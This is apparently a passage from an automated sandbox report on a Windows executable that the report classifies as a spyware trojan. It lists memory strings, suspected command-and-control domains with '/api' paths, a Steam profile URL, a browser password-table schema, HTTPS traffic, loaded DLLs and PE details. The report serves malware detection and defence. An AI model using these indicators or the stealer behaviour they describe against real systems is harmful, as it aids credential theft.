              Source: 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
              Source: 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0b
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apibV7
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiwDnl
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/g
              Source: 8ZVMneG.exe, 00000003.00000002.2485639494.0000000003C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/k
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piMe
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
              Source: 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apical
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/em
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/t
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402934236.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2377108126.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: 8ZVMneG.exe, 00000003.00000003.2377108126.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49781 version: TLS 1.2
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EF50000_2_00EF5000
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EE29F20_2_00EE29F2
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECB2B80_2_00ECB2B8
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EE0C160_2_00EE0C16
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ED57900_2_00ED5790
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECFF5A0_2_00ECFF5A
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: String function: 00ECB7C0 appears 47 times
              Source: 8ZVMneG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 8ZVMneG.exeStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
              Source: 8ZVMneG.exeStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@13/3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
              Source: C:\Users\user\Desktop\8ZVMneG.exeCommand line argument: ~q0_2_00ED70D0
              Source: C:\Users\user\Desktop\8ZVMneG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 8ZVMneG.exe, 00000003.00000003.2333691545.0000000003C2A000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2333538909.0000000003C47000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2355216686.0000000003C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 8ZVMneG.exeVirustotal: Detection: 65%
              Source: 8ZVMneG.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile read: C:\Users\user\Desktop\8ZVMneG.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"Jump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 8ZVMneG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: 8ZVMneG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 8ZVMneG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 8ZVMneG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 8ZVMneG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 8ZVMneG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: 8ZVMneG.exeStatic PE information: section name: .CODE
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECB97A push ecx; ret 0_2_00ECB98D
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
